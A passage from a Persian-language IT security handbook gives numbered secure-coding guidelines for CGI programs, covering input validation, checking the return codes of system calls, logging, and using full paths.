‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٦٢‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ‪ ،‬ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮ‪ ،‬ﻋﻼﺋﻢ ﺩﺭﻳﺎﻓﺖﺷﻮﻧﺪﻩ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺟﻨﺒﻪﻫﺎﻱ ﺭﻓﺘﺎﺭﻱ ﺭﺍ ﺑﻪ ﺩﻗﺖ ﻣﻮﺭﺩ ﻣﻼﺣﻈﻪ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﻓﻬﺮﺳﺘﻲ ﺍﺯ‬
‫ﻫﻤﺔ ﺧﻄﺎﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﻭ ﻧﻴﺰ ﻧﺤﻮﺓ ﻭﺍﻛﻨﺶ ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺑﻪ ﺁﻥ ﺧﻄﺎﻫﺎ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﭘﻴﺶ ﺍﺯ ﻧﻮﺷﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑـﻪ ﺯﺑـﺎﻥ‬
‫ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﻪ ﺯﺑﺎﻥ ﺍﻧﮕﻠﻴﺴﻲ ﻭ ﻳﺎ ﺯﺑﺎﻥ ﻣﺎﺩﺭﻱ ﺧﻮﺩ ﺷﺮﺡ ﺩﻫﻴﺪ‪.‬‬
‫ﭘﻴﺶ ﺍﺯ ﺷﺮﻭﻉ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ‪ ،‬ﻣﺸﺨﺼﻪﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﻧﺎﻣﻪ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺭﺍ ﺑﻪ ﺭﺅﻳﺖ ﻳﻚ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺩﻳﮕـﺮ ﺑﺮﺳـﺎﻧﻴﺪ‪ .‬ﻣﻄﻤـﺌﻦ‬ ‫‪.٢‬‬
‫ﺷﻮﻳﺪ ﻛﻪ ﺁﻧﻬﺎ ﻧﻴﺰ ﻣﺸﺨﺼﻪﻫﺎ ﺭﺍ ﻣﻲﻓﻬﻤﻨﺪ ﻭ ﻣﻌﺘﻘﺪﻧﺪ ﻋﻤﻠﻜﺮﺩ ﺻﺤﻴﺤﻲ ﺩﺍﺭﺩ‪ .‬ﺍﮔﺮ ﻧﺘﻮﺍﻧﺴﺘﻴﺪ ﻳﻚ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺩﻳﮕﺮ ﺭﺍ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﺻﺤﺖ ﻋﻤﻠﻜﺮﺩ ﺁﻧﭽﻪ ﺭﻭﻱ ﻛﺎﻏﺬ ﻃﺮﺍﺣﻲ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍﺿﻲ ﻛﻨﻴﺪ‪ ،‬ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﻓﺎﺯ ﻃﺮﺍﺣـﻲ ﺑﺎﺯﮔـﺸﺘﻪ ﻭ ﻣﺸﺨـﺼﻪﻫـﺎﻱ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬
‫ﻭﺍﺿﺤﺘﺮ ﻛﻨﻴﺪ‪ .‬ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ ﭼﻨﺪ ﺑﺮﺍﺑﺮ ﺯﻣﺎﻧﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺻﺮﻑ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻫﻨﮕﺎﻡ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺻﺮﻓﻪﺟﻮﻳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺯﺑﺎﻧﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻤﻨﻲ ﺭﺍ ﺑﺮﺍﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ CGI‬ﻓﺮﺍﻫﻢ ﻛﻨﺪ‪ ،‬ﻭ ﺍﺯ‬ ‫‪.٣‬‬
‫ﺧﻄﺎﻫﺎﻱ ﺳﺮﺭﻳﺰﻱ ‪ buffer‬ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﺪ‪ .‬ﺯﺑﺎﻧﻬﺎﻱ ‪ ،python ،perl‬ﻭ ‪ rudy‬ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﮔﺰﻳﻨﻪﻫﺎﻱ ﻣﻨﺎﺳﺐ ﻭ ﺯﺑﺎﻧﻬـﺎﻱ ‪C‬‬
‫ﻻ ﮔﺰﻳﻨﻪﻫﺎﻱ ﺿﻌﻴﻒ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ .‬ﻫﻴﭽﮕﺎﻩ ﺑﺮﺍﻱ ﻣﻔﺴﺮﻫﺎﻱ ﭘﻮﺳﺘﻪﺍﻱ ﻣﺜﻞ ‪ ،/bin/sh‬ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ‪CGI‬‬ ‫ﻭ ‪ C++‬ﻣﻌﻤﻮ ﹰ‬
‫ﻧﻨﻮﻳﺴﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻗﺒﻠـﻲ ﺍﺳـﺘﻔﺎﺩﺓ ﻣﺠـﺪﺩ ﻛﻨﻴـﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﻓﺎﻳﻠﻬـﺎﻱ ﻛﺘﺎﺑﺨﺎﻧـﻪﺍﻱ‬ ‫‪.٤‬‬
‫ﺭﻓﻊﺍﺷﻜﺎﻝﺷﺪﺓ ‪ CGI‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﻳﻚ ﻓﺎﻳﻞ ﻛﺘﺎﺑﺨﺎﻧﻪﺍﻱ ﻣﺨﺼﻮﺹ ﺧﻮﺩ ﺑﻨﻮﻳﺴﻴﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻣﺮﺍﻗﺐ ﺍﺳﺘﻔﺎﺩﺓ‬
‫ﻣﺠﺪﺩ ﺍﺯ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺣﺎﻭﻱ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻧﻴﺰ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺑﻌﺪ ﺍﺯ ﻧﻮﺷﺘﻦ ﻫﺮ ﻗﺴﻤﺖ ﻛﻮﭼﻚ ﺍﺯ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺁﺯﻣﺎﻳﺶ ﺁﻥ ﺑﭙﺮﺩﺍﺯﻳﺪ‪ .‬ﻭﻗﺘﻲ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩﻳـﺪ ﻣﺘﻨﺎﻭﺑـﹰﺎ ﺁﻧـﺮﺍ‬ ‫‪.٥‬‬
‫ﺁﺯﻣﺎﻳﺶ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺮﺍﻱ ﺁﺯﻣﺎﻳﺶ ﻗﺴﻤﺖ ﻣﻮﺭﺩ ﻧﻈﺮ ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺑﺎﻳـﺪ ﻫـﻢ ﺍﺯ ﺩﺍﺩﻩﻫـﺎﻱ ﻭﺭﻭﺩﻱ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ ﻭ ﻫـﻢ ﺍﺯ‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﻭﺭﻭﺩﻱ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﻮﺍﺑﻊ ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﭘﻴﺶ ﺍﺯ ﭘـﺬﻳﺮﻓﺘﻦ ﺁﺭﮔﻮﻣﺎﻧﻬـﺎﻱ‬
‫ﻭﺭﻭﺩﻱ‪ ،‬ﺻﺤﺖ ﻭ ﺍﻋﺘﺒﺎﺭ ﺁﻧﻬﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﻨﺪ ﻭ ﺩﺭ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻱ ﻧﺎﺩﺭﺳﺖ‪ ،‬ﻭﺍﻛﻨﺸﻬﺎﻱ ﻣﻨﻄﻘﻲ )ﻣﺜﻞ ﺧـﺮﻭﺝ ﺍﺯ ﺑﺮﻧﺎﻣـﻪ ﻭ ﻧﻤـﺎﻳﺶ‬
‫ﻳﻚ ﭘﻴﺎﻡ ﻳﺎ ﻛﺪ ﻣﺒﻨﻲ ﺑﺮ ﻧﺎﺻﺤﻴﺢ ﺑﻮﺩﻥ ﺁﺭﮔﻮﻣﺎﻥ( ﺍﺯ ﺧﻮﺩ ﻧﺸﺎﻥ ﺩﻫﻨﺪ‪ .‬ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﺷﻜﺎﻻﺕ ﺳـﺎﺩﺓ ﺑﺮﻧﺎﻣـﻪﺍﻱ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺳﻮﺀ ﻛﺮﺩ‪ .‬ﺑﺎ ﻧﻮﺷﺘﻦ ﺩﻗﻴﻘﺘﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ‪ ،‬ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺍﻳﻤﻨـﻲ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺗﻤﺎﻣﻲ ﻣﻘﺎﺩﻳﺮ ﻭﺭﻭﺩﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﺗﻌﺪﺍﺩ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﺯ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ ﺍﺯ ﺁﻧﺠـﺎ ﻧﺎﺷـﻲ‬ ‫‪.٦‬‬
‫ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﻣﻬﺎﺟﻢ ﻳﻚ ﻣﻘﺪﺍﺭ ﻭﺭﻭﺩﻱ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﻭ ﻳﺎ ﻳﻚ ﻗﺎﻟﺐ ﺩﺍﺩﻩﺍﻱ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ ﺭﺍ ﺑﻪ ﻳﻚ ﺗﺎﺑﻊ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﻳﻚ ﺭﺍﻩ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺑﺮﻭﺯ ﭼﻨﻴﻦ ﻣﺸﻜﻼﺗﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﻫﻤﻮﺍﺭﻩ ﺁﺭﮔﻮﻣﺎﻧﻬـﺎﻱ ﻭﺭﻭﺩﻱ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﻧﻈـﺮ‬
‫ﺻﺤﺖ ﻭ ﺍﻋﺘﺒﺎﺭ‪ ،‬ﺑﺮﺭﺳﻲ ﻛﻨﻨﺪ‪ .‬ﻛﻨﺘﺮﻝ ﺁﺭﮔﻮﻣﺎﻧﻬﺎ ﭼﻨﺪﺍﻥ ﻣﻮﺟﺐ ﻛﺎﻫﺶ ﺳﺮﻋﺖ ﺍﻳﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎ ﻧﻤﻲﺷﻮﺩ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻋﺚ ﻣـﻲﺷـﻮﺩ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﺨﺎﺻﻢ ﻛﻤﺘﺮ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﺓ ﺳﻮﺀ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ‪ ،‬ﻛﻨﺘﺮﻝ ﺁﺭﮔﻮﻣﺎﻧﻬﺎ ﻭ ﮔﺰﺍﺭﺵ ﺧﺮﺍﺑﻴﻬﺎ ﺳﺒﺐ ﺁﻥ ﺍﺳﺖ ﻛـﻪ‬
‫ﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻧﻴﺰ ﺳﺎﺩﻩﺗﺮ ﮔﺮﺩﺩ‪.‬‬
‫ﻓﺮﺁﻳﻨﺪ ﺍﺻﻼﺡ ﺍﺷﻜﻼﺕ ﻏﻴﺮﺍﻣﻨﻴﺘ ﹺ‬
‫ﺁﺭﮔﻮﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻲﻓﺮﺳﺘﺪ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺣﺘـﻲ ﺍﮔـﺮ ﺑﺮﻧﺎﻣـﻪ ﻳـﻚ ﺗـﺎﺑﻊ ﺳﻴـﺴﺘﻤﻲ ﺭﺍ ﻓﺮﺍﺧـﻮﺍﻧﻲ‬ ‫‪.٧‬‬
‫ﻣﻲﻛﻨﺪ‪ ،‬ﺑﺎﺯ ﻫﻢ ﺷﻤﺎ ﺑﺎﻳﺪ ﺁﺭﮔﻮﻣﺎﻧﻬﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻫﻤﺎﻧﻬﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺁﻥ ﺗﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺍﻧﺘﻈﺎﺭ ﺁﻧﺮﺍ‬
‫ﻼ ﺍﮔﺮ ﻓﻜﺮ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﺩﺭ ﺷﺎﺧﺔ ﺟﺎﺭﻱ ﺑﺎﺯ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺗـﺎﺑﻊ )(‪ index‬ﺩﺭ ﺯﺑـﺎﻥ ‪ C‬ﻳـﺎ‬ ‫ﺩﺍﺭﺩ‪ .‬ﻣﺜ ﹰ‬
‫‪ perl‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺩﺭ ﻧﺎﻡ ﻓﺎﻳﻞ ﻋﻼﻣﺖ ﻣﻤﻴﺰ )‪ (/‬ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﻧﻪ‪ ،‬ﻭ ﺍﮔﺮ ﻧﺎﻡ ﻓﺎﻳﻞ ﺩﺍﺭﺍﻱ ﻋﻼﻣـﺖ ﻣﻤﻴـﺰ ﺍﺳـﺖ ﻭ‬
‫ﻧﺒﺎﻳﺪ ﺍﻳﻨﻄﻮﺭ ﺑﺎﺷﺪ‪ ،‬ﺑﺮﻧﺎﻣﻪ ﻧﺒﺎﻳﺪ ﺁﻥ ﻓﺎﻳﻞ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ‪.‬‬
‫ﻫﻤﺔ ﺧﺮﻭﺟﻴﻬﺎﻱ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ‪) POSIX‬ﻛﻪ ﺗﻮﺳﻂ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻧﻮﺷﺘﻪﺷﺪﻩ ﺑـﻪ ﺯﺑﺎﻧﻬـﺎﻱ ‪ C‬ﻭ ‪ PERL‬ﻣـﻮﺭﺩ‬ ‫‪.۸‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ( ﻫﺮ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳﻚ ﻛﺪ ﺧﺮﻭﺟﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﺣﺘﻲ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺳﻴﺴﺘﻤﻲ ﻛـﻪ ﺷـﻤﺎ‬
‫ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﺁﻧﻬﺎ ﺭﺍ ﻧﻤﻲﺩﻫﻴﺪ ‪ -‬ﻣﺜـﻞ )(‪ ،chdir() ،write‬ﻭ ﻳـﺎ )(‪ - chown‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﺤـﺖ ﺷـﺮﺍﻳﻂ ﺍﺳـﺘﺜﻨﺎﻳﻲ‬
‫ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ ﻧﻜﻨﻨﺪ ﻭ ﺧﺮﻭﺟﻴﻬﺎﻱ ﻏﻴﺮﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺗﻮﻟﻴﺪ ﻛﻨﻨـﺪ‪ .‬ﺯﻣﺎﻧﻴﻜـﻪ ﻳـﻚ ﻓﺮﺍﺧـﻮﺍﻧﻲ ﻧﺘﻮﺍﻧـﺴﺖ ﺩﺭﺳـﺖ ﻋﻤـﻞ ﻛﻨـﺪ‪ ،‬ﻣﺘﻐﻴـﺮ‬
‫‪٣٦٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺷﻤﺎﺭﺓ ﺧﻄﺎ‪ ٢٢٠‬ﺭﺍ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺩﻟﻴﻞ ﻭﻗﻮﻉ ﺍﺷﻜﺎﻝ ﺭﺍ ﺑﻔﻬﻤﻴﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ﺧﻮﺩ ﺭﺍ ﻃﻮﺭﻱ ﺑﻨﻮﻳﺴﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻣﻘﺎﺩﻳﺮ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻧﺘﻈـﺎﺭ ﺭﺍ‬
‫ﺛﺒﺖ ﻛﻨﺪ ﻭ ﺳﭙﺲ ﭼﻨﺎﻧﭽﻪ ﻳﻚ ﻓﺮﺍﺧﻮﺍﻧﻲ ﺳﻴﺴﺘﻢ ﺑﻪ ﻫﺮ ﺩﻟﻴﻞ ﻏﻴﺮﻣﻨﺘﻈﺮﻩﺍﻱ ﺑﺎ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﺪ‪ ،‬ﺑﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻪ ﭘﺮﺩﺍﺯﺓ ﺁﻥ ﭘﺎﻳﺎﻥ‬
‫ﻲ ﺁﻳﻨﺪﻩ ﻛﻤﻚ ﺷﺎﻳﺎﻧﻲ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺩﻫﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﺍﻗﺪﺍﻣﺎﺕ ﺑﻪ ﻛﻢ ﺷﺪﻥ ﺍﺷﻜﺎﻻﺕ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻭ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘ ﹺ‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺍﺧﻠﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﮔﺮ ﻗﺮﺍﺭ ﺍﺳﺖ ﻳﻚ ﻣﺘﻐﻴﺮ ﺑﺮﻧﺎﻣﺔ ﺷﻤﺎ ﺗﻨﻬﺎ ﺑﺘﻮﺍﻧﺪ ﻣﻘﺎﺩﻳﺮ ‪،۲ ،۱‬‬ ‫‪.٩‬‬
‫ﻭ ﻳﺎ ‪ ۳‬ﺭﺍ ﺑﮕﻴﺮﺩ‪ ،‬ﺁﻥ ﻣﺘﻐﻴﺮ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻘﺎﺩﻳﺮ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪ ،‬ﻭ ﺑﺮﺍﻱ ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﻘﺎﺩﻳﺮﻱ ﻏﻴﺮ ﺍﺯ ﺍﻳﻨﻬﺎ ﺩﺍﺭﺩ ﭘﻴﺶﺑﻴﻨﻲﻫـﺎﻱ ﻻﺯﻡ ﺭﺍ‬
‫ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ‪) .‬ﺍﮔﺮ ﺑﺎ ﺯﺑﺎﻥ ‪ C‬ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺎﻛﺮﻭﻱ ‪ assert‬ﺑﺴﺎﺩﮔﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪(.‬‬
‫ﻻ ﺛﺒﺘﻬﺎﻱ ﻣﻔﺼﻞ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﺟﺰﺋﻲ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﺛﺒﺘﻬـﺎﻱ ﺧﻼﺻـﻪ ﺩﺭ‬ ‫‪ .١٠‬ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﻭ ﻃﺮﺯ ﺭﻓﺘﺎﺭ ﺁﻥ ﺛﺒﺘﻬﺎﻱ ﻣﺘﻤﺎﺩﻱ ﺑﻌﻤﻞ ﺁﻭﺭﻳﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺑﺠﺎﻱ ﺛﺒﺖ ﻧﺘﺎﻳﺞ ﺣﺎﺻﻞ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺭﺍﻳﺞ ﻭ ﺗﻜﻴﻪ ﺑﺮ ﻓﺎﻳﻞ ﺛﺒﺖ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ‪ ،‬ﺍﻃﻼﻋـﺎﺕ ﺛﺒـﺖ‬
‫ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻓﺎﻳﻞ ﺛﺒﺖ ﺍﺧﺘﺼﺎﺻﻲ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻳﺎﻓﺘﻦ ﻣﺸﻜﻼﺕ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺳﺎﺩﻩﺗﺮ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ‪) syslog‬ﺩﺭ ‪ (UNIX‬ﺭﺍ ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺗﺎ ﺑﺎ ﺁﻥ ﺑﺘﻮﺍﻧﻴﺪ ﺛﺒﺘﻬﺎ ﺭﺍ ﺑﺴﻮﻱ ﻓﺎﻳﻠﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻫﺪﺍﻳﺖ ﻛﻨﻴـﺪ‪،‬‬
‫ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻔﺮﺳﺘﻴﺪ‪ ،‬ﻭ ﻳﺎ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪ .١١‬ﺗﺎ ﺣﺪ ﻣﻤﻜﻦ ﻗﺴﻤﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺳﺎﺩﻩ ﻭ ﻛﻮﭼﻚ ﺳﺎﺯﻳﺪ‪.‬‬
‫ﻞ ﻧﺎﻡ ﺑﺮﺍﻱ ﺁﺭﮔﻮﻣﺎﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪ ،‬ﻫﻢ ﺑﺮﺍﻱ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳﺘﻮﺭﻱ ﻭ ﻫـﻢ ﺑـﺮﺍﻱ ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩﺍﻱ‪ .‬ﺑﺠـﺎﻱ‬‫‪ .١٢‬ﻫﻤﻮﺍﺭﻩ ﺍﺯ ﻣﺴﻴﺮﻫﺎﻱ ﻛﺎﻣ ﹺ‬
‫ﻭﺍﺑﺴﺘﻪﻛﺮﺩﻥ ﺍﺟﺮﺍﻱ ﺻﺤﻴﺢ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺷﺎﺧﺔ ﺟﺎﺭﻱ‪ ،‬ﺻﺮﺍﺣﺘﹰﺎ ﻣﺴﻴﺮ ﺻﺤﻴﺢ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺗﻌﻴﻴﻦ ﻧﻤﺎﻳﻴﺪ‪.‬‬
